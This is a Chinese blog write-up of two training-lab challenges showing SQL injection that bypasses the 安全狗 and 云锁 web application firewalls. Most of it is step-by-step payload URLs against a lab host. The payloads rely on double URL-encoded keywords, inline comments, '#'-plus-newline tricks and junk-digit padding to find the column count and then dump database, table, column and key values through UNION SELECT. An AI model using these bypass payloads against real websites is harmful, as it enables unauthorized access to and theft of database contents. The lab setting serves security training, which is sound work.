SQL注入绕过WAF两道题目

1 篇文章 0 订阅
1 篇文章 0 订阅

前言

WAF工作原理

在实际的渗透测试过程中,经常会碰到网站存在WAF的情况。网站存在WAF,意味着我们不能使用安全工具对网站进行测试,因为一旦触碰了WAF的规则,轻则丢弃报文,重则拉黑IP。所以,我们需要手动进行WAF的绕过,而绕过WAF前肯定需要对WAF 的工作原理有一定的理解。

WAF绕过之SQL注入绕过安全狗

在这里插入图片描述
先随便输入一个双引号来显示报错闭合的语句

http://120.25.24.45:31832/?id=1"

在这里插入图片描述

http://120.25.24.45:31832/?id=1")--+

在这里插入图片描述

http://120.25.24.45:31832/?id=1")/*asifnjanf*/%2561%256e%25641=2--+

这里解释一下%2561%256e%2564这个就是and的url编码,可以去bp转一下
/**/ 这个就是SQL注入内联注释符,绕WAF有时候会用到的

它的报错信息是Unknown column '6e' in 'where clause' 意思是不存在6个列字段
在这里插入图片描述

http://120.25.24.45:31832/?id=1")/*asifnjanf*/OrDEr%23%0aby/*asifnjanf*/3--+

这里来确定它的字段数为3列
在这里插入图片描述

http://120.25.24.45:31832/?id=-1%22) union%23%0a all select/*safaqwf*/1,database(%23%0a),group_concat(schema_name) /*asdnuqw*/from information_schema.schemata--+

这里有一个细节,就是id=后面的加上一个负号,就是不显示前面的结果
爆出所有数据库,我们要选择目标数据库dotaxueyuan
在这里插入图片描述

http://120.25.24.45:31832/?id=-1%22)%20union%23%0a%20all%20select/*safaqwf*/1,database(%23%0a),group_concat(table_name)%20/*asdnuqw*/from%20information_schema.tables where table_schema='dotaxueyuan'--+

爆出表名,目标表名是key
在这里插入图片描述

http://120.25.24.45:31832/?id=-1%22)%20union%23%0a%20all%20select/*safaqwf*/1,database(%23%0a),group_concat(column_name)%20/*asdnuqw*/from%20information_schema.columns where table_name='key'--+

爆出列名key
在这里插入图片描述

http://120.25.24.45:31832/?id=-1%22)%20union%23%0a%20all%20select/*safaqwf*/1,database(%23%0a),group_concat(`key`)%20/*asdnuqw*/from%20dotaxueyuan.key--+

爆出key值
在这里插入图片描述

SQL注入绕过云锁

在这里插入图片描述
先随便输入一个单引号来显示报错闭合的语句

http://120.25.24.45:30550/?id=1'

在这里插入图片描述

http://120.25.24.45:30550/?id=1'--+

在这里插入图片描述

http://120.25.24.45:30550/?id=111111111111111111111'/*daewqqw*/%23%0a%2561%256e%25641=2--+

这里解释一下111111111111111111111这么一大串数字1就是运用SQL注入之垃圾数据绕过的原理,%2561%256e%2564这个就是and的url编码,可以去bp转一下
/**/ 这个就是SQL注入内联注释符,绕WAF有时候会用到的
%23%0a这个URL解码就是#号和换行,也可以说是一个绕过姿势

它的报错信息是Unknown column '6e' in 'where clause' 意思是不存在6个列字段
在这里插入图片描述

http://120.25.24.45:30550/?id=111111111111111111111'/*daewqqw*/%23%0aOrder%23%0a/*qweqwd*/by/*dasasdsaddac*/3--+

判断字段数,这个题的字段数为3,它这题如果你输入正确的语句是不会回显的
在这里插入图片描述

http://120.25.24.45:30550/?id=-111111111111111111111'/*daewqqw*/%23%0aUnion%23%0a/*qweqwd*/select/*dasasdsaddac*/1,database(),3--+

爆出目标数据库dotaxueyuan
在这里插入图片描述

http://120.25.24.45:30550/?id=-111111111111111111111'/*daewqqw*/%23%0aUnion%23%0a/*qweqwd*/select/*dasasdsaddac*/1,database(),group_concat(table_name) from information_schema.tables where table_schema=%27dotaxueyuan%27--+

爆出表名,目标表名是key
在这里插入图片描述

http://120.25.24.45:30550/?id=-111111111111111111111'/*daewqqw*/%23%0aUnion%23%0a/*qweqwd*/select/*dasasdsaddac*/1,database(),group_concat(column_name) from information_schema.columns where table_name=%27key%27--+

爆出列名key
在这里插入图片描述

http://120.25.24.45:30550/?id=-111111111111111111111'/*daewqqw*/%23%0aUnion%23%0a/*qweqwd*/select/*dasasdsaddac*/1,database(),group_concat(`key`) from dotaxueyuan.key--+

爆出key值
在这里插入图片描述
靶场链接来自于东塔攻防世界靶场
https://labs.do-ta.com/index/course/index?one=15&two=17&three=51&level=-1&other=-1&title=

  • 12
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 12
    评论
评论 12
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值